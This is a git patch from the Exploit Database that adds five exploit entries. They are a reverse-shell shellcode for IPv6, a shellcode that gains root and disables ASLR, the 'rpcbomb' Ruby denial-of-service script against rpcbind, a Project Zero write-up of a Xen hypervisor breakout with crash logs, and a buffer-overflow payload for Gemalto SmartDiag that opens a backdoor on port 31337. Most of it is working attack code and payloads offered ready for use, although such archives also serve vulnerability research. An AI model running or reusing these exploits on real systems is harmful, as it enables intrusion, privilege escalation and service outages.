From 6f37b94a66b357301dd72c5c349dc9bfde0d77b6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 9 May 2017 04:46:38 +0000 Subject: [PATCH] DB: 2017-05-09 5 new exploits RPCBind / libtirpc - Denial of Service Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH) Xen 64bit PV Guest - pagetable use-after-type-change Breakout Linux/x86 - Disable ASLR Shellcode (80 bytes) Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes) --- files.csv | 5 + platforms/lin_x86-64/shellcode/41970.asm | 115 ++++++++++++++++++ platforms/lin_x86/shellcode/41969.c | 67 +++++++++++ platforms/linux/dos/41974.rb | 89 ++++++++++++++ platforms/linux/local/41973.txt | 145 +++++++++++++++++++++++ platforms/windows/local/41972.txt | 111 +++++++++++++++++ 6 files changed, 532 insertions(+) create mode 100755 platforms/lin_x86-64/shellcode/41970.asm create mode 100755 platforms/lin_x86/shellcode/41969.c create mode 100755 platforms/linux/dos/41974.rb create mode 100755 platforms/linux/local/41973.txt create mode 100755 platforms/windows/local/41972.txt diff --git a/files.csv b/files.csv index 07a908be2..c17710cb6 100644 --- a/files.csv +++ b/files.csv @@ -5484,6 +5484,7 @@ id,file,description,date,author,platform,type,port 41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0 41957,platforms/windows/dos/41957.html,"Microsoft Internet Explorer 11 - 'CMarkup::DestroySplayTree' Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0 41965,platforms/java/dos/41965.txt,"CloudBees Jenkins 2.32.1 - Java Deserialization",2017-05-05,SecuriTeam,java,dos,0 +41974,platforms/linux/dos/41974.rb,"RPCBind / libtirpc - Denial of Service",2017-05-08,"Guido Vranken",linux,dos,111 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -8970,6 +8971,8 @@ id,file,description,date,author,platform,type,port 41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0 41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0 41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0 +41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0 +41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -16119,6 +16122,8 @@ id,file,description,date,author,platform,type,port 41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0 41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0 41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egg-hunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0 +41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0 +41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 diff --git a/platforms/lin_x86-64/shellcode/41970.asm b/platforms/lin_x86-64/shellcode/41970.asm new file mode 100755 index 000000000..abccacdba --- /dev/null +++ b/platforms/lin_x86-64/shellcode/41970.asm @@ -0,0 +1,115 @@ +[BITS 64] + +; **reverse ip6 tcp shell +; * size >= 113 bytes (depends of ip addr, default is ::1) +; * nullbytes free (depends only on ip addr, +; you could always and the ip add to remove +; the nulls like i did with the port) +; * it sleeps and then tries to recconect (default 3 seconds) +; +;shell = +;"\x6a\x0a\x5f\x6a\x01\x5e\x48\x31\xd2\x6a\x29\x58\x0f\x05\x50\x5b" +;"\x52\x48\xb9\x00\x00\x00\x00\x00\x00\x01\x51\xb9\x00\x00\x00\x00" +;"\x51\xba\xff\xff\x05\xc0\x66\x21\xfa\x52\x48\x31\xf6\x56\x6a\x03" +;"\x54\x5f\x6a\x23\x58\x0f\x05\x59\x59\x53\x5f\x54\x5e\x6a\x1c\x5a" +;"\x6a\x2a\x58\x0f\x05\x48\x85\xc0\x75\xe0\x48\x96\x6a\x03\x5e\x6a" +;"\x21\x58\x48\xff\xce\x0f\x05\x75\xf6\x48\xbf\x2f\x2f\x62\x69\x2f" +;"\x73\x68\x56\x57\x48\x31\xd2\x54\x5f\x6a\x3b\x58\x0f\x05" +; +; again, the nulls propably won't even come up with your global ip addr +; if they do, and you don't encodee the payload, you could do some +; bitwise operations +; +; made by srakai (github.com/Srakai) + + +AF_INET6 equ 10 +SOCK_STREAM equ 1 +SOCKET equ 41 +CONNECT equ 42 +DUP2 equ 33 +EXECVE equ 59 +NANOSLEEP equ 35 + +section .text + +global _start + +_start: + +; socket() + +push AF_INET6 +pop rdi +push SOCK_STREAM +pop rsi +xor rdx, rdx +push SOCKET +pop rax +syscall + +push rax +pop rbx + +; create struct sockaddr_in6 +push rdx ;scope id = 0 +mov rcx, 0x0100000000000000 ;sin6_addr for local link use: +push rcx ;sin6_addr 0x0100000000000000 +mov rcx, 0x0000000000000000 ;sin6_addr 0x0000000000000000 +push rcx ;sin6_addr +mov edx, 0xc005FFFF ;sin6_flowinfo=0 , family=AF_INET6, port=1472 +and dx, di ;to change port change P, 0xPPPP000A +push rdx + +sleep: + +xor rsi, rsi +; struct timespec +push rsi ;push 0 +push 3 ;seconds to sleep + +; nanosleep() +push rsp +pop rdi +push NANOSLEEP +pop rax +syscall + +pop rcx ;clear stack +pop rcx + +; connect() +push rbx +pop rdi +push rsp +pop rsi +push 28 ;sizeof struct +pop rdx +push CONNECT +pop rax +syscall + +test rax, rax ;if (rax&rax) ==0 +jnz sleep + +; dup2() +xchg rsi, rax ;rsi=0 +push 3 +pop rsi +dup2: +push DUP2 +pop rax +dec rsi +syscall +jnz dup2 + +; execve() +mov rdi, 0x68732f6e69622f2f +push rsi +push rdi +xor rdx, rdx +push rsp +pop rdi +push EXECVE +pop rax +syscall diff --git a/platforms/lin_x86/shellcode/41969.c b/platforms/lin_x86/shellcode/41969.c new file mode 100755 index 000000000..ef6b6089c --- /dev/null +++ b/platforms/lin_x86/shellcode/41969.c @@ -0,0 +1,67 @@ +/* + Linux/x86 + setuid-disable-aslr.c by @abatchy17 - abatchy.com + Shellcode size: 80 bytes + SLAE-885 + + section .text + global _start + + _start: + + ; + ; setruid(0,0) + ; + xor ecx,ecx + mov ebx,ecx + push 0x46 + pop eax + int 0x80 + + ; + ; open("/proc/sys/kernel/randomize_va_spaceX", O_RDWR) + ; + xor eax,eax ; EAX = 0 + jmp aslr_file + shellcode: + pop ebx ; EBX now points to '/proc/sys/kernel/randomize_va_space' + mov byte [ebx + 35],al + push byte 5 + pop eax + push byte 2 + pop ecx + int 80h + + ; + ; write(fd, '0', 1) + ; + xchg eax, ebx ; One byte less than mov ebx, eax + push byte 4 + pop eax + xchg ecx, edx ; ECX already contains 2 + dec edx + push byte 0x30 + mov ecx, esp ; ECX now points to "0" + int 80h ; EAX will now contains 1 + + ; + ; exit(0) + ; + int 80h ; Yep, that's it + + aslr_file: + call shellcode ; Skips the filename and avoids using JMP + db '/proc/sys/kernel/randomize_va_space' +*/ + +#include +#include + +unsigned char sc[] = "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x31\xc0\xeb\x1b\x5b\x88\x43\x23\x6a\x05\x58\x6a\x02\x59\xcd\x80\x93\x6a\x04\x58\x87\xca\x4a\x6a\x30\x89\xe1\xcd\x80\xcd\x80\xe8\xe0\xff\xff\xff\x2f\x70\x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72\x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63\x65"; + +int main() +{ + printf("Shellcode size: %d\n", strlen(sc)); + int (*ret)() = (int(*)())sc; + ret(); +} \ No newline at end of file diff --git a/platforms/linux/dos/41974.rb b/platforms/linux/dos/41974.rb new file mode 100755 index 000000000..e144ad537 --- /dev/null +++ b/platforms/linux/dos/41974.rb @@ -0,0 +1,89 @@ +#!/usr/bin/ruby +# +# Source: https://raw.githubusercontent.com/guidovranken/rpcbomb/fe53048af2d4fb78c911e71a30f21afcffbbf5e1/rpcbomb.rb +# +# By Guido Vranken https://guidovranken.wordpress.com/ +# Thanks to Sean Verity for writing an exploit in Ruby for an earlier +# vulnerability: https://www.exploit-db.com/exploits/26887/ +# I've used it as a template. + +require 'socket' +def usage + abort "\nusage: ./rpcbomb.rb <# bytes to allocate> [port]\n\n" +end +bomb = """ + ` + # , + : @ @ @ @ @ @ + @ @ ; . + @ @ @ . @ @ + @ @ @ @ @ ` @ @ + . ` @ # + ; @ @ @ . : @ @ @ @ + @ @ @ @ @ @ @ @ @ @ @ ; + @ @ @ @ @ @ @ @ @ @ @ @ @ ` + @ @ @ @ @ @ @ @ @ @ @ @ @ @ : + # @ @ @ @ @ @ @ @ @ @ @ @ @ ' + @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ + . @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ + + @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ + + @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ + : @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ + @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ + @ @ @ @ @ @ @ @ @ @ @ @ @ @ , + @ @ @ @ @ @ @ @ @ @ @ @ @ + , @ @ @ @ @ @ @ @ @ @ @ + ` @ @ @ @ @ @ @ @ @ + , @ @ @ @ @ + r p c b o m b + + DoS exploit for *nix rpcbind/libtirpc. + + (c) 2017 Guido Vranken. + + https://guidovranken.wordpress.com/ + +""" + +puts bomb + +if ARGV.length >= 2 + begin + host = ARGV[0] + numBytes = Integer(ARGV[1]) + port = ARGV.length == 3 ? Integer(ARGV[2]) : 111 + rescue + usage + end + + pkt = [0].pack('N') # xid + pkt << [0].pack('N') # message type CALL + pkt << [2].pack('N') # RPC version 2 + pkt << [100000].pack('N') # Program + pkt << [4].pack('N') # Program version + pkt << [9].pack('N') # Procedure + pkt << [0].pack('N') # Credentials AUTH_NULL + pkt << [0].pack('N') # Credentials length 0 + pkt << [0].pack('N') # Credentials AUTH_NULL + pkt << [0].pack('N') # Credentials length 0 + pkt << [0].pack('N') # Program: 0 + pkt << [0].pack('N') # Ver + pkt << [4].pack('N') # Proc + pkt << [4].pack('N') # Argument length + pkt << [numBytes].pack('N') # Payload + + s = UDPSocket.new + s.send(pkt, 0, host, port) + + sleep 1.5 + + begin + s.recvfrom_nonblock(9000) + rescue + puts "No response from server received." + exit() + end + + puts "Allocated #{numBytes} bytes at host #{host}:#{port}.\n" + + "\nDamn it feels good to be a gangster.\n\n" +else + usage +end \ No newline at end of file diff --git a/platforms/linux/local/41973.txt b/platforms/linux/local/41973.txt new file mode 100755 index 000000000..a33782c2c --- /dev/null +++ b/platforms/linux/local/41973.txt @@ -0,0 +1,145 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1231 + +This is a bug in Xen that permits an attacker with control over the +kernel of a 64bit X86 PV guest to write arbitrary entries into a live +top-level pagetable. + +To prevent PV guests from doing things like mapping live pagetables as +writable, Xen assigns types to physical pages and tracks type-specific +references with a reference counter ("type count", stored in the low +bits of page->u.inuse.type_info). + +64-bit PV guests have multiple places in which the addresses of +top-level pagetables are stored: + +arch.guest_table_user and arch.guest_table in the vcpu struct point to +the pagetables the guest has designated as user-mode top-level +pagetable and kernel-mode top-level pagetable. Both of these fields +take a type-specific reference on the pagetable to prevent the guest +from mapping it as writable. + +arch.cr3 in the vcpu struct points to the current top-level pagetable +of the vCPU. While the vCPU is scheduled, arch.cr3 is the same as the +physical CPU's CR3. +arch.cr3 does not take an extra type-specific reference; it borrows +the reference from either arch.guest_table_user or arch.guest_table. +This means that whenever the field from which the reference is +borrowed is updated, arch.cr3 (together with the physical CR3) must be +updated as well. + +The guest can update arch.guest_table_user and arch.guest_table using +__HYPERVISOR_mmuext_op with commands +MMUEXT_NEW_USER_BASEPTR (for arch.guest_table_user) and +MMUEXT_NEW_BASEPTR (for arch.guest_table). The handlers for these +commands assume that when the hypercall is executed, arch.cr3 always +equals arch.guest_table: The MMUEXT_NEW_BASEPTR handler updates +arch.cr3 to the new arch.guest_table, the MMUEXT_NEW_USER_BASEPTR +handler doesn't touch arch.cr3. + +Hypercalls can only be executed from kernel context, so on hypercall +entry, arch.cr3==arch.guest_table is indeed true. However, using the +__HYPERVISOR_multicall hypercall, it is possible to execute the +__HYPERVISOR_iret hypercall, which can switch the pagetables to user +context, immediately followed by the __HYPERVISOR_mmuext_op hypercall +before actually entering guest user context. + + +This can be exploited from guest kernel context roughly as follows: + + - copy all entries from the top-level kernel pagetable over the + top-level user pagetable (to make it possible for a post-iret + hypercall to access guest kernel memory) + - allocate a new page to be used later as top-level user pagetable, + copy the contents of the current top-level user pagetable into it, + remap it as readonly and pin it as a top-level pagetable + - perform the following operations in a single multicall: + - switch to user context using __HYPERVISOR_iret + - change arch.guest_table_user to the new top-level user pagetable + using __HYPERVISOR_mmuext_op with command MMUEXT_NEW_USER_BASEPTR + - unpin the old top-level user pagetable + - map the old top-level user pagetable as writable + - write crafted entries into the old top-level user pagetable + + +I have attached a proof of concept that corrupts the top-level +pagetable entry that maps the hypervisor text, causing a host +triplefault. I have tested the proof of concept in the following +configurations: + +configuration 1: +running inside VMware Workstation +Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)" +dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu +unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu + +configuration 2: +running on a physical machine with Qubes OS 3.2 installed +Xen version 4.6.4 + +Compile the PoC with ./compile.sh, then run ./attack as root. + +PoC Filename: xen_ptuaf.tar + +################################################################################ + +Here's an exploit that causes the hypervisor to execute shellcode that then deliberately causes a hypervisor GPF by calling a noncanonical address. Usage: + +root@pv-guest:~/xen_ptuaf_hv_shellcode_exec# ./compile.sh +make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic' + LD /root/xen_ptuaf_hv_shellcode_exec/built-in.o + CC [M] /root/xen_ptuaf_hv_shellcode_exec/module.o +nasm -f elf64 -o /root/xen_ptuaf_hv_shellcode_exec/native.o /root/xen_ptuaf_hv_shellcode_exec/native.asm + LD [M] /root/xen_ptuaf_hv_shellcode_exec/test.o + Building modules, stage 2. + MODPOST 1 modules +WARNING: could not find /root/xen_ptuaf_hv_shellcode_exec/.native.o.cmd for /root/xen_ptuaf_hv_shellcode_exec/native.o + CC /root/xen_ptuaf_hv_shellcode_exec/test.mod.o + LD [M] /root/xen_ptuaf_hv_shellcode_exec/test.ko +make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic' +root@pv-guest:~/xen_ptuaf_hv_shellcode_exec# ./attack +kernel CR3: 0xaa2dd000 +L1 self-mapping is up, should have reliable pagetable control now +virt_to_pte(0x7f5bd439a000) +[ rest of output missing because of VM crash ] + + +Serial output: + +(XEN) ----[ Xen-4.6.0 x86_64 debug=n Tainted: C ]---- +(XEN) CPU: 2 +(XEN) RIP: e008:[<00007f5bd439a03f>] 00007f5bd439a03f +(XEN) RFLAGS: 0000000000010246 CONTEXT: hypervisor (d1v2) +(XEN) rax: 1337133713371337 rbx: 1337133713371337 rcx: 1337133713371337 +(XEN) rdx: 1337133713371337 rsi: 00007ffe98b5e248 rdi: 0000600000003850 +(XEN) rbp: 1337133713371337 rsp: ffff8301abb37f30 r8: 0000000000000000 +(XEN) r9: 000000000000001b r10: 0000000000000000 r11: 0000000000000202 +(XEN) r12: 0000000080000000 r13: ffff8800026dd000 r14: ffff880003453c88 +(XEN) r15: 0000000000000007 cr0: 0000000080050033 cr4: 00000000001506a0 +(XEN) cr3: 00000000aa2dc000 cr2: ffff88007cfb2e98 +(XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: 0000 cs: e008 +(XEN) Xen stack trace from rsp=ffff8301abb37f30: +(XEN) 1337133713371337 1337133713371337 1337133713371337 1337133713371337 +(XEN) 1337133713371337 1337133713371337 1337133713371337 1337133713371337 +(XEN) 1337133713371337 1337133713371337 1337133713371337 1337133713371337 +(XEN) 1337133713371337 0000000000401556 000000000000e033 0000000000000246 +(XEN) 00007ffe98b5e208 000000000000e02b 0000000000000000 0000000000000000 +(XEN) 0000000000000000 0000000000000000 0000000000000002 ffff830088c9c000 +(XEN) 000000312b835580 0000000000000000 +(XEN) Xen call trace: +(XEN) [<00007f5bd439a03f>] 00007f5bd439a03f +(XEN) +(XEN) +(XEN) **************************************** +(XEN) Panic on CPU 2: +(XEN) GENERAL PROTECTION FAULT +(XEN) [error_code=0000] +(XEN) **************************************** +(XEN) +(XEN) Reboot in five seconds... + +PoC Filename: xen_ptuaf_hv_shellcode_exec.tar + + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41973.zip + diff --git a/platforms/windows/local/41972.txt b/platforms/windows/local/41972.txt new file mode 100755 index 000000000..2b93dca22 --- /dev/null +++ b/platforms/windows/local/41972.txt @@ -0,0 +1,111 @@ +# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow +- SEH Overwrite +# Date: 16-03-2017 +# Software Link: http://support.gemalto.com/index.php?id=download_tools +# Exploit Author: Majid Alqabandi +# Contact: https://www.linkedin.com/in/majidalqabandi/ +# CVE: CVE-2017-6953 +# Category: Local - command execution - Buffer Overflow - SEH Overwrite. + +1. Description +SymDiag.exe is vulnerable to buffer overflow, SEH overwrite. +When trying to (Register a new card), Input fields are vulnerable to stack +overflow attack which leads to code execution and other possible security +threats. + + + +2. Proof of Concept + +The following PoC is provided code will: +- Exploit the vulnerability. +- Execute shell code. +- Create a backdoor on port 31337. + +To exploit, start SmartDiag.exe tool, choose "Register a new card", on the +ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag +v2.5): + +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +528340005283400052834000528340005283400052834000528340005283 +400052834000528340005283400052834000528340005283400052834000 +52834000528340005283400052834000572b0410477f40008c214100f494 +400041ed40003b4140003552011078ab0110010000009cf2021000100000 +328b031040000000d02203100120400026e6400090909090e2f500109090 +909090909090909090909090909090909090909090909090909090909090 +909090909090909090909090909090909090909090909090909090909090 +909090909090909090909090909090909090909090909090909090909090 +909090909090909090909090909090909090909090909090909090909090 +909090909090909090909090909090909090909090909090909090909090 +9090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc315814 +0358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec4760450 +6d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8 +f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e +8667694e0b79ad69f30cc5898e161ef3549283531f046065ccd3e369b990 +ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf55 +30d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64 +f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85 +adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bd +c7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca +3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c5 +38f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0 +f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + + + +3. Solution: +Vendor has been informed and confirmed the issue, no fix is available yet +from vendor.